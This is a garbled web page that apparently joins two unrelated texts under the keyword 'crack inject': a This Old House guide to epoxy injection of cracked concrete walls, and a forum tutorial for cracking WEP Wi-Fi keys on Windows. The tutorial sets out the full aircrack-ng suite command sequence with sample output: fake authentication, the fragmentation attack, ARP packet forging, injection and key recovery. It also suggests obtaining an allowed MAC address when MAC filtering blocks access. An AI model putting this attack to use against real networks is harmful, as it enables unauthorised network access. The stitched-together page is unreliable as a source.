Crack Inject

Crack WEP with aircrack + inject packets (WINDOWS)

Crack Analysis. As with all repair and rehabilitation of concrete, the initial job analysis is by far the most important step. Epoxy Injection Resin will weld.

Steps for crack injection including installing injection ports, sealing the surface, injecting the crack, and removing the ports.

Share

S

H

A

R

E

Home

Basements Foundations Fixing Cracks in Concrete

A simple, permanent repair for cracked concrete walls

Joseph Truini

Photo: Geoffrey Gross

Previous Step

Next Step

All Steps

Close

Introduction

Step 1

Repairing the Crack

Step 2

Block Out the Injection Ports

Step 3

Mix the Epoxy Sealer

Step 4

Attach the Injection Port

Step 5

Spread Sealer Along the Crack

Step 6

Inject the Epoxy into the Crack

Step 7

Seal Up the Injection Ports

Step 8

Cut Away the Injection Ports

Difficulty: None

Step 6: Inject the Epoxy into the Crack

If the other side of the wall is accessible, see if the crack goes clean through. If it does, seal it up with crack sealer, too. Allow the sealer to cure for 6 to 10 hours before injecting the epoxy. Thoroughly mix the LCR epoxy using the plunger rod that comes with the kit. Place the LCR cartridge into a caulk gun. Starting at the lowest injection port, dispense the epoxy into the crack. Continue squeezing the trigger until epoxy begins to ooze out of the port directly above.

Ask TOH users about Basements Foundations

Discuss

Contribute to This Story Below

Add Comment

More in Basements Foundations

Cooling Ventiliation

Heating Water Heaters

Insulation

Plumbing

Newsletters

See All Newsletters

See Sample

Dozens of ideas, loads of how-tos, and the latest advice on the projects and products you need to improve your home today, plus special offers.

Sign me up.

From Our Partners

This Old House To Go

Subscribe

Give A Gift

Newsletter

Tablet

Share

Step 7: Seal Up the Injection Ports

Remove the gun and plug up the port you just filled. Now insert the cartridge tip into the port that s oozing and squeeze the trigger to dispense the epoxy. Repeat this procedure for the remaining ports; plug up each one before moving on to the next.

Step 8: Cut Away the Injection Ports

Allow the LCR to cure for five days, then cut off the necks of the ports with a hacksaw. If desired, you can patch the severed ports with a little crack sealer.

Polygem

Box 609

Dept. TH700

W. Chicago, IL 60186

630/231-5600

Kitchens

Kitchens

Kitchen Cabinets

Kitchen Countertops

Kitchen Sinks

Backsplashes

Islands

Appliances

Kitchen Lighting

Wet Bars

Small Kitchens

Outdoor Kitchens

Bathrooms

Bathrooms

Bathroom Sinks

Showers

Tubs

Bathroom Lighting

Small Bathrooms

Other Rooms

Living Spaces

Living Rooms

Dining Areas

Hallways Foyers

Bedrooms

Basements

Mudrooms

Media Rooms

Storage

Pets

Workspaces

Laundry Rooms

Home Offices

Workshops

Landscaping

Landscaping

Gardening

Garden Planning

Lawn Care

Patios

Fences Stone Walls

Trees Shrubs

Outdoor Structures

Pools, Ponds, Fountains

Yard Garden Tools

Exterior

Exterior

Decks, Patios Porches

Curb Appeal

Windows

Drainage Gutters

Driveway Walkway

Garages

House Styles

Find a Pro in Your Area

Remodels Upgrades

Remodels Upgrades

Before Afters

Small Space Solutions

Easy Upgrades

Your New Home

America s Best Remodel

Best Old House Neighborhoods

Save This Old House

Salvage

Money

Money

Money-Saving Ideas

Home Real Estate

How-To Repair

Interior

Doors

Fireplaces

Cabinets Shelving

Stairs

Furniture

Drywall Plaster

Ceilings

House Exterior

Decks

Porches

Garage How-To

Roofing

Siding

Molding Carpentry

Crown Molding

Wainscoting

Trim

Flooring

Carpeting

Wood Floors

All Floors

Yard Garden

Driveways Walkways

Pools, Ponds Fountains

Framing Insulation

Framing

Insulation

Plumbing, HVAC Electrical

Heating

Cooling

Plumbing

Toilets

Lighting

Electrical

Ventilation

Water Heaters

Home Technology

Basements Foundations

Paint Finishes

Painting

Wallpaper

Tile

Painting Finishing Tools

Upkeep

Cleaning

Spring Upkeep

Summer Upkeep

Fall Upkeep

Winter Upkeep

Health Safety

Fire Safety

Healthy Home

Green

Safety Prevention

Home Inspection Nightmares

Tools

Hand Tools

Power Tools

Workshop Accessories

TOH Pro

Project of the Week

Discussions

Discussions

Painting Finishes

Interiors Trim

Doors Windows

Electrical Lighting

Insulation HVAC

Tools Products

Green House Home

New DIY Ideas

Your Home

TV Shows Projects

Magazine

Deck, Patio Porch

Walls Ceilings

Favorites

TOH Favorites

TOH Top 100

Making the Grade: Get Schooled By the Pros

Family Projects

Holidays

Holidays at Home

Smart Home

Idea Houses

TOH TV Veteran s Special House Project

TOH Toon

TOH Downloadable Lessons

Video.

TUTORIAL BY. TRANSMIT FOR THETAZZONE/TAZFORUM

TAZ Forum :: A Computer, Gaming, and Social Network Community of Friends :: TAZForum :: View topic – Tutorial: Crack WEP with aircrack inject packets WINDOWS

Okay this is my first tutorial so go easy on me.

This is a tutorial for cracking WEP and injecting packets for networks with no clients. You ll be able to do so on a windows platform tested in VISTA and works.

-

First of all I ve got all my info out of this thread and the links posted there:

6781 postdays 0 postorder asc start 0

I can only make this tutorial thanks to Zermelo that kept answering my question when I was lost.

GETTING EVERYTHING READY:

- The first and most important thing to do is to get an adapter that works with airodump:

check this thread for that:

6235

and this one:

5401 start 0

- Then you need to install the proper drivers for your card. I used the commview drivers. If your card isn t compatible with Commview you ll need to install the wildpackets drivers.

to do this for cards compatible with commview download commview here and install its drivers:

download event2 commwifi event3 goto /files/ca5.zip

for other cards download the wildpackets drivers here:

NOTE: I m going to base the rest of this tutorial on a card with the commview drivers installed.

- Next step is to download this. dll file again only commview driver users :

- Next up, download the aircrack package. Download it here:

unzip the file to your c: drive it can be another drive but this is the easiest

put the commview.dll file you just downloaded in the map you extracted it s called aircrack and if you extracted it to your c: drive like I said it should be in c: aircrack

Now go to you place where you installed Commview in the program itself and look for a file called ca2k.dll default install dir is c: program files commview for wifi

Copy this file to the same folder as the commview.dll c: aircrack

OKAY that was a whole lot. this was just to get everything ready. If you did all of this correct you ll be able to move to the next step.

THE CRACKING:

Step 1:

- Open a command prompt start run cmd.exe

Step 2:

- type the following in the command prompt:

- HIT ENTER

Step 3:

- type the following in the same command prompt:

Quote:

airserv-ng -d commview.dll

- You should see something like this coming up in the command prompt

Opening card commview.dll

Setting chan 1

Opening sock port 666

Serving commview.dll chan 1 on port 666

Step 4:

- Open a new command prompt LEAVE THE PREVIOUS ONE OPEN AT ALL TIMES..

- Typ the following the the new command prompt:

-HIT ENTER

Step 5:

- Now typ this in the same command prompt:

airodump-ng 127.0.0.6

note: if you know what channel the to-monitor-network is on you can make it this. I recommend this.:

airodump-ng –channel YOURCHANNELNUMBER HERE 127.0.0.6

Airodump-ng should start capturing data from the networks on the given channel now, you ll notice it isn t going fast except if it s a big company s network or something. We are going to speed this process up.

Take a note of the following:

1: BSSID of the network you want to crack MAC address.

2: ESSID of the network you want to crack name of the network example: wifi16, mynetwork,

3: The mac of the card you are using to monitor the packets

LEAVE THE 2 COMMAND PROMPTS YOU ALREADY HAVE OPEN OPEN

Step 6:

- Open a new command prompt

- Type in the following:

Step 7:

- Type in the following in command prompt:

aireplay-ng -1 0 -e ESSID-OF-THE-NETWORK-YOU-WANT-TO-CRACK -a BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.6

yes quite confusing so a quick example:

ESSID wifi16

BSSID ::

MAC OF CARD I M USING ::

so that will get me:

aireplay-ng -1 0 -e wifi16 -a :: -h :: 127.0.0.6

if all goes well you ll get this as the outcome:

Sending Authentication Request

Authentication successful

Sending Association Request

Association successful

if you get:

AP rejects the source MAC address

It means MAC filtering is enabled on the network you want to crack and you ll need to get hold of a mac address that s allowed access.

if you keep getting:

sending authentication request

Try moving closer to the AP.

Step 8:

in the same command prompt as the one in step 7 type:

aireplay-ng -5 -b BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.6

yes quite confusing once again so a quick example:

aireplay-ng -5 -b :: -h :: 127.0.0.6

if all goes well you ll get this:

Waiting for a data packet

Read number packets

Step 9:

if you wait a little bit you ll soon be prompted with a packet like this:

Size: 120, FromDS: 1, ToDS: 0 WEP BSSID the bssid

Dest. MAC the dest mac

Source MAC the source mac

0 0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080. B. l.

0 0010: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01 . 4 bz.

0 0020: 6d6d b1e0 92a8 039b ca6f cecb 5364 6e16 mm. o..Sdn.

0 0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4. . pI. .. . 0.

0 0040: 7013 f7f3 5953 1234 5727 146c eeaa a594 p YS.4W. l.

0 0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5. Uf G-. 9W.. .

0 0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1 Q. D w. . R.

0 0070: 0505 933f af2f 740e . ./t.

Use this packet.

note: size can vary, I always pressed in y and it worked

- press in Y

You should see something like this coming up or similar :

Saving chosen packet in replay_src-0124-161120.cap

Data packet found.

Sending fragmented packet

Got RELAYED packet..

Thats our ARP packet.

Trying to get 384 bytes of a keystream

Trying to get 1500 bytes of a keystream

Saving keystream in fragment-0124-161129.xor

Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Note 1: It doesn t need to be 1500 bytes..

Note 2: Check the bold part, you re going to need this file.

AGAIN DON T CLOSE THIS COMMAND PROMPT..

No answer, repeating

Trying a LLC NULL packet

Just keep trying. It automatically starts over again moving closer to the AP has been reported to help.

anyways, if you got the bytes of keystream everything worked it s time for the next step.

Step 10:

- Press CTRL C in the command prompt used in step 8

- Now type in the following:

packetforge-ng -0 -a BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR -k 192.168.1.100 -l an ELL not a 1 192.168.1.1 -y fragment-0124-161129.xor -w arp-request

Remember the file I made bold in part 8. Well it s obviously the same as in 9 meaning you need to put the same filename here.

The part I made green here is the filename you use to save the packet, you can choose whatever you want but you must use this filename in the upcomming steps.

Step 11:

Now that we ve got our ARP REQ packet we can start injecting.

Here s how to do this.

- Go to the command prompt used in step 9

aireplay-ng -2 -r arp-request 127.0.0.6

The green part once again indicates the filename.

You should now see something like this coming up:

Size: 68, FromDS: 0, ToDS: 1 WEP BSSID :6C:7E:

Dest. MAC FF:FF:FF:FF:FF:FF

Source MAC 00:0F:B5:AB:CB:9D

0 0000: 0841 0201 0014 6c7e 4080 000f b5ab cb9d. A. l.

0 0010: ffff ffff ffff 8001 6c48 0000 0999 881a . .lH

0 0020: 49fc 21ff 781a dc42 2f96 8fcc 9430 144d Ix..B/. 0.M

0 0030: 3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1 . .gC.V. .

0 0040: d64f b709. O..

- Type in Y

This should come up now:

Saving chosen packet in replay_src-0124-163529.cap

You should also start airodump-ng to capture replies.

End of file.sent numberOfPackets number pps

You ll see the numberOfPackets rising really fast, you are injecting these packets now.

Step 12:

Now go back to the command prompt where you had airodump-ng in open

and press CTRL C

now type in the following:

airodump-ng –channel CHANNELYOUWANTTOCAPTUREFROM –write Filename 127.0.0.6

Note: Filename The name of the file where the data packets are saved, this will be used in the next step

If all goes correct you should be capturing as much packets per second as you are injecting maybe even more.

Step 13:

when you think you have enough

note: 200000 min for 64bit just capture 1Million to be sure

press CTRL C in the command prompt that has airodump-ng running and enter the following:

aircrack-ng -n 64 Filename.cap

note:

Filename see previous step

64 the bit depth of the key 128 for 128bit etc

and if it goes like planned a message will pop-up saying:

KEY FOUND: YourKey

That s it. I hope this was helpful, any question/remarks/complaints please ask/tell and I ll try to help/respond as soon as possible..

Extra useful links:

WEP CRACK tutorial from nokia:

2069 highlight wep sid 4b61ec462d62072de2d06ff1722a5366

Info about the attack used fragmentation :

fragmentation

Zermelo s thread about this subject:

Topic on another forum about this:

1626.0

news and informationbusiness,health,entertainment,technology

Gravatars are small images that can show your personality. You can get your gravatar for free today.

Tutorial: Crack WEP with aircrack inject packets WINDOWS TUTORIAL BY. TRANSMIT FOR THETAZZONE/TAZFORUM. TAZ Forum :: A Computer, Gaming, and.

Fixing Cracks in Concrete A simple, permanent repair for cracked concrete walls.

crack inject crack inject Fixing Cracks in Concrete

Guide specification for epoxy crack injection in concrete and wood.